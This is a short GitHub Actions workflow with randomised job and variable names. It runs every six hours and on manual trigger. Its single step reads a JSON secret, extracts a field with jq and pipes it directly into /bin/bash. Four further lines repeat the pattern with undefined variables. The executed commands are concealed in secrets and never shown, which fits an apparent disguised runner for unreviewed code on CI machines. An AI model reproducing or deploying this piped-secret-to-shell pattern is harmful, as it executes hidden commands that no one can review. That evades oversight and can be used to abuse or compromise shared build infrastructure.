name: zhangcongrong6247

on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangcongrong6247
        env:
          bwqo26: ${{ secrets.bwqo26 }}
        run: |
          echo $bwqo26 | jq -r .edi046 | /bin/bash
          echo $rfr82 | jq -r .dpbnf1278 | /bin/bash
          echo $kezny4 | jq -r .kcaq729 | /bin/bash
          echo $parkr11283 | jq -r .dx8629 | /bin/bash
          echo $awjvq482 | jq -r .ql071 | /bin/bash

